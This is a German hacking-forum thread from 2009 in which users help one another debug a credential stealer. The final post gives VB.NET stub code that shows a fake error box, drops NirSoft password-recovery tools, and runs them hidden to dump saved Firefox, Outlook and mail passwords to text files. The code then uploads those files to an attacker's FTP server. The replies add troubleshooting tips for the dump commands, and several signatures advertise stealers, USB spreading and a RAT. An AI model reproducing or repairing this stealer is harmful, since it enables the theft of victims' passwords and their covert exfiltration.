Hallo
ich habe da ein problem mit meinem stealer , also: ich lasse ja die nirsoft tools als ressource droppen.
mit meinem stealer ging das ja auch als ich 1 nirsoft tool hatte.
jetzt habe ich 3 nirsoft tools und jetzt zeigt er mir immer an das C:\windows\passwörter.txt nicht gefunden werden konnte. ich bin mir eigentlich zu 100% sicher das der code stimmt doch irgendwie will das nicht gehen.
muss ich zwischen den uploads noch sleep machen ???
also ich lasse die .txt dokumente in 4 verschiedenen uploaden .
Ergebnis 1 bis 10 von 14
-
29.03.2009, 13:09 #1Eigener Benutzertitel
- Registriert seit
- 23.12.2008
- Beiträge
- 1.767
passwörter.txt konnte nicht gefunden werden
-
29.03.2009, 13:12 #2Da N!nja oder so :>
- Registriert seit
- 23.09.2008
- Beiträge
- 424
Auf Vista muss die Datei(dein Stealer) als Admin ausgeführt werden sonst wird keine "passwörter.txt" erstellt.
<o_O>wenn man einen bot mit .net schreibt, dann hat man automatisch ein bot.netArmes Freepler.
Zitat von IRC
-
29.03.2009, 13:30 #3Trojaner
- Registriert seit
- 30.01.2009
- Beiträge
- 99
So ist es. Zitat von DarkFire
Liegt aber auch am verzeichnis ... in dem fall (C:\windows\passwörter.txt) werden adminrechte benötigt im gegensatz zu .. z.B. Desktop oder Eigene Dateien/Documents ... (bei vista der benutzername)
Die besagte technik bei vista nennt sich User Account Protection die dafür sorgt das prozesse standardmäßig ohne adminrechte gestartet werden.
Versuchs mal so
habs jetzt net getestet weil kein vb.net zur handCode:Imports System.Security //.... Private Sub BspButton_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnRun.Click StartNewProcessWithAdminCredentials("C:\Windows\passwörter.txt") End Sub //...
viel glück...
!Neolution!"The quieter you become, the more you are able to hear." Zitat von Archy
-
29.03.2009, 14:16 #4Eigener Benutzertitel
- Registriert seit
- 23.12.2008
- Beiträge
- 1.767
ich habe aber kein vista ^^
-
29.03.2009, 14:19 #50x4D5A5045
- Registriert seit
- 23.12.2008
- Beiträge
- 215
Zitat von DarkFire
Falsch! Aber egal
Ein Prozess benötigt keine Admin-Rechte, um mal eben eine normale passwort.txt zu erstellen. (es sei denn Linux... o.ä.)
Schau mal auf meine Stealer. Die laufen auch unter Vista ohne das als admin auszuführen...
@Threadstarter
Wann und wo kommt die Meldung? von Nirsoft? schau mal, dass du mit Umgebungsvariablen arbeitest oder deine passwort.txt erstmal woanders (auf C:\) erstellst/droppst...NEU *USB SPREADING*
NEU localsteam *fixed* [stealt alle Usernamen+PW]
YEAAAH ICH BIN BETA TESTER VON APOCALYPSE RAT
*NEU ACCOUNT EXPANDER PRIVATE* Infos via PM
www.snify.6x.to ---> wieder online
-
29.03.2009, 14:40 #6Eigener Benutzertitel
- Registriert seit
- 23.12.2008
- Beiträge
- 1.767
stimmt gute idee sniffy , danke werds mal probieren
EDIT://also irgendwie geht das nicht er droppt zwar auf C: doch er erstellt keine PW.txt -.-
woran könnte das den liegen :/Geändert von inmate (29.03.2009 um 14:50 Uhr)
-
29.03.2009, 15:07 #70x4D5A5045
- Registriert seit
- 23.12.2008
- Beiträge
- 215
probiers mal nur mit der Dos-Konsole
also Start --> ausführen --> cmd ---> C:\nirsoft.exe /stext C:\passwort.txt
Wichtig sind die Parameter und die Pfadangaben mit Backslash und Schrägstich.
Vielleicht liegt dort dein Fehler...NEU *USB SPREADING*
NEU localsteam *fixed* [stealt alle Usernamen+PW]
YEAAAH ICH BIN BETA TESTER VON APOCALYPSE RAT
*NEU ACCOUNT EXPANDER PRIVATE* Infos via PM
www.snify.6x.to ---> wieder online
-
29.03.2009, 15:36 #8CIH-Virus
- Registriert seit
- 23.12.2008
- Beiträge
- 488
Ich hatte das ungefähr gleich problem, nur das der stealer die txt datei nicht produzieren konnte. Alle Sicherheitssoftware war im selbsttest ausgeschaltet inklusiefe firewall, aber es kam manchmal eine fehlermeldung oder die textdatei wurde nicht erzeugt. Und das ist bei fast allen stealern so gewesen. mfg
-
29.03.2009, 15:39 #90x4D5A5045
- Registriert seit
- 23.12.2008
- Beiträge
- 215
Also bei mir funktioniert alles reibungslos.
Versuch mal (kp wie das in VB ist) ne Shell zu starten mit cmd \c "nirsoft.exe /stext C:\test.txt"
Vielleicht kannst du ein Code-Ausschnitt etc. zu posten?!NEU *USB SPREADING*
NEU localsteam *fixed* [stealt alle Usernamen+PW]
YEAAAH ICH BIN BETA TESTER VON APOCALYPSE RAT
*NEU ACCOUNT EXPANDER PRIVATE* Infos via PM
www.snify.6x.to ---> wieder online
-
29.03.2009, 15:55 #10Eigener Benutzertitel
- Registriert seit
- 23.12.2008
- Beiträge
- 1.767
so hier der von meiner stub:
If fake = True Then
MessageBox.Show(text, titel, MessageBoxButtons.OK, MessageBoxIcon.Error)
End If
If fire = True Then
Dim ressource1() As Byte = My.Resources.PasswordFox
FileOpen(1, ("C:\fox.exe"), OpenMode.Binary)
FilePut(1, ressource1)
FileClose(1)
Shell("C:\fox.exe /stext" & "C:\passworteneu.txt", AppWinStyle.Hide)
End If
If mess = True Then
Dim ressource2() As Byte = My.Resources.mspass
FileOpen(1, ("C:\mspasss.exe"), OpenMode.Binary)
FilePut(1, ressource2)
FileClose(1)
Shell("C:\mspasss.exe /stext" & "C:\passworter.txt", AppWinStyle.Hide)
End If
If mail = True Then
Dim ressource3() As Byte = My.Resources.mailpv
FileOpen(1, ("C:\mailsss.exe"), OpenMode.Binary)
FilePut(1, ressource3)
FileClose(1)
Shell("C:\mailsss.exe /stext" & "C:\passwortes.txt", AppWinStyle.Hide)
End If
If fire = True Then
My.Computer.Network.UploadFile("C:\passworteneu.tx t", "ftp://" & FTP & "/" & "firefoxpws.dat", user, pass)
End If
If steam = True Then
My.Computer.Network.UploadFile("C:\passwortealt.tx t", "ftp://" & FTP & "/" & "steamwps.dat", user, pass)
End If
If mess = True Then
My.Computer.Network.UploadFile("C:\passworter.txt" , "ftp://" & FTP & "/" & "outlookpws.dat", user, pass)
End If
If mail = True Then
My.Computer.Network.UploadFile("C:\passwortes.txt" , "ftp://" & FTP & "/" & "mailpws.dat", user, pass)
End If
Me.Close()
End Sub
End Class
Zitieren
